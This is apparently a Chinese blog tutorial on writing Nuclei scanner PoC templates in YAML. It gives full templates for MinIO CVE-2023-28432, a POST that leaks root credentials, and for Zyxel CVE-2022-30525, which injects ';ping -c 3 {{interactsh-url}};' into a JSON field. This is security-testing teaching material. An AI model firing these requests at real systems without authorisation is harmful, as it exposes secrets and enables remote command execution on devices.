Day102:漏洞发现-漏扫项目篇&Poc开发&Yaml语法&插件一键生成&匹配结果&交互提取

目录

Nuclei-Poc开发-环境配置&编写流程

Nuclei-Poc开发-Yaml语法&匹配提取

Yaml Poc模版:

开发流程:

案例1:CVE-2023-28432 (匹配结果)

案例2:CVE-2022-30525(匹配交互)

Nuclei-Poc开发-BurpSuite一键生成插件


知识点:

1、Nuclei-Poc开发-环境配置&编写流程

2、Nuclei-Poc开发-Yaml语法&匹配提取

3、Nuclei-Poc开发-BurpSuite一键生成插件

Nuclei-Poc开发-环境配置&编写流程

1、开发环境:Vscode+Yaml插件

https://code.visualstudio.com/

2、开发文档参考资料

官方文档

https://docs.projectdiscovery.io/templates/protocols/http/basic-http

nuclei poc模板编写笔记

https://blog.csdn.net/qq_41315957/article/details/126594572
https://blog.csdn.net/qq_41315957/article/details/126594670

Nuclei-Poc开发-Yaml语法&匹配提取

YAML是一种数据序列化语言,它的基本语法规则注意如下:

  • 大小写敏感
  • 使用缩进表示层级关系
  • 缩进时不允许使用Tab键,只允许使用空格。
  • 缩进的空格数目不重要,只要相同层级的元素左侧对齐即可

Yaml Poc模版:

1、编号 id(描述)

2、信息 info(描述)

3、请求 http file tcp等(漏洞以什么方式请求)

4、匹配 matchers Interactsh(对结果匹配关键字来判断是否存在漏洞)

5、提取 extractors(对结果提取页面长度、状态等来判断是否存在漏洞)

开发流程:

0、poc模版套用修改

1、poc创建独立编号

2、poc填入详细信息

3、poc提交协议流程编写

4、poc结果匹配模式判断

5、poc结果提取模式判断

案例1:CVE-2023-28432 (匹配结果)

https://github.com/vulhub/vulhub/blob/master/minio/CVE-2023-28432/README.zh-cn.md

id: CVE-2023-28432

info:
  name: MinIO集群模式信息泄露漏洞(CVE-2023-28432)
  author: xiaodisec
  severity: low
  description: 在其RELEASE.2023-03-20T20-16-18Z版本(不含)以前,集群模式部署下存在一处信息泄露漏洞,攻击者可以通过发送一个POST数据包获取进程所有的环境变量,其中就包含账号密码MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD。
  reference:
    - https://github.com/vulhub/vulhub/blob/master/minio/CVE-2023-28432/README.zh-cn.md
  tags: MinIO,CVE
  
http:
  - raw:
      - |
        POST /minio/bootstrap/v1/verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
    matchers:
      - type: word
        part: body
        words:
          - '"MINIO_ROOT_PASSWORD":'
          - '"MINIO_ROOT_USER":'
          - '"MinioEnv":'
        condition: and

案例2:CVE-2022-30525(匹配交互)

https://blog.csdn.net/weixin_43080961/article/details/124776553

id: CVE-2022-30525

info:
  name: Zyxel 防火墙远程命令注入漏洞
  author: xiaodisec
  severity: high
  description: 该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。
  reference:
    - https://blog.csdn.net/weixin_43080961/article/details/124776553
  tags: zyxel,cve,rce
  
http:
  - raw:
      - |
        POST /ztp/cgi-bin/handler HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"{{exploit}}","data":"hi"}
    payloads:
      exploit:
        - ";ping -c 3 {{interactsh-url}};"
    
    matchers:
      - type: word
        part: interactsh_protocol
        name: dns
        words:
          - "dns"

Nuclei-Poc开发-BurpSuite一键生成插件

nuclei-burp-plugin:

https://github.com/projectdiscovery/nuclei-burp-plugin

1、导入或商店安装

2、配置插件路径信息

3、数据包选择生成模版

CVE-2023-28432

然后在bp复现下这个漏洞poc,成功后右键数据包使用插件生成nuclei插件模板

CVE-2022-30525

vscode插件合集,05月最新,包括以下插件: bibhasdn.django-html-1.2.0 bibhasdn.django-snippets-1.1.0 bitlang.cobol-1.7.8 christian-kohler.npm-intellisense-1.3.0 christian-kohler.path-intellisense-1.4.2 chrmarti.regex-0.2.0 CoenraadS.bracket-pair-colorizer-1.0.37 daltonjorge.scala-0.0.5 danields761.dracula-theme-from-intellij-pythoned-0.1.4 DavidAnson.vscode-markdownlint-0.17.0 dbaeumer.vscode-eslint-1.4.10 donjayamanne.jupyter-1.1.4 donjayamanne.python-extension-pack-1.0.1 DotJoshJohnson.xml-1.9.2 DotJoshJohnson.xml-2.0.0 eg2.vscode-npm-script-0.3.4 eriklynd.json-tools-1.0.2 fisheva.eva-theme-0.3.1 formulahendry.code-runner-0.9.3 formulahendry.terminal-0.0.10 gerane.theme-druid-0.0.2 GrapeCity.gc-excelviewer-2.0.21 humao.rest-client-0.18.4 humy2833.ftp-simple-0.6.3 Ikuyadeu.r-0.5.9 Ikuyadeu.r-lsp-0.0.7 itryapitsin.scala-0.1.7 itryapitsin.scalasnippets-0.1.7 jasonnutter.search-node-modules-1.3.0 jithurjacob.nbpreviewer-1.0.0 josephtbradley.hive-sql-0.0.2 kalitaalexey.vscode-rust-0.4.2 kondratiev.sshextension-0.2.1 luqimin.forgive-green-0.2.1 magicstack.magicpython-1.0.12 mohsen1.prettify-json-0.0.3 mooman219.rust-assist-0.2.0 ms-python.anaconda-extension-pack-1.0.0 ms-python.python-2018.4.0 ms-toolsai.vscode-ai-0.1.8 ms-vscode.go-0.6.80 mtxr.sqltools-0.13.0 PKief.material-icon-theme-3.4.0 qub.qub-xml-vscode-1.2.8 redhat.java-0.25.0 redhat.vscode-yaml-0.0.12 rust-lang.rust-0.4.3 rust-lang.rust-0.4.4 scala-lang.scala-0.1.2 sensourceinc.vscode-sql-beautify-0.0.4 truman.autocomplate-shell-0.1.1 vahidk.tensorflow-snippets-0.3.3 vscjava.vscode-java-debug-0.9.0 vscjava.vscode-java-pack-0.3.0 vscjava.vscode-java-test-0.6.1 vscjava.vscode-maven-0.8.0 waderyan.nodejs-extension-pack-0.1.9 wholroyd.jinja-0.0.8 xabikos.javascriptsnippets-1.6.0 yzhang.markdown-all-in-one-1.3.0 yzhang.markdown-all-in-one-1.4.0 ZakCodes.rust-snippets-0.0.1 zhuangtongfa.material-theme-2.13.5 zhuangtongfa.material-theme-2.13.6
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值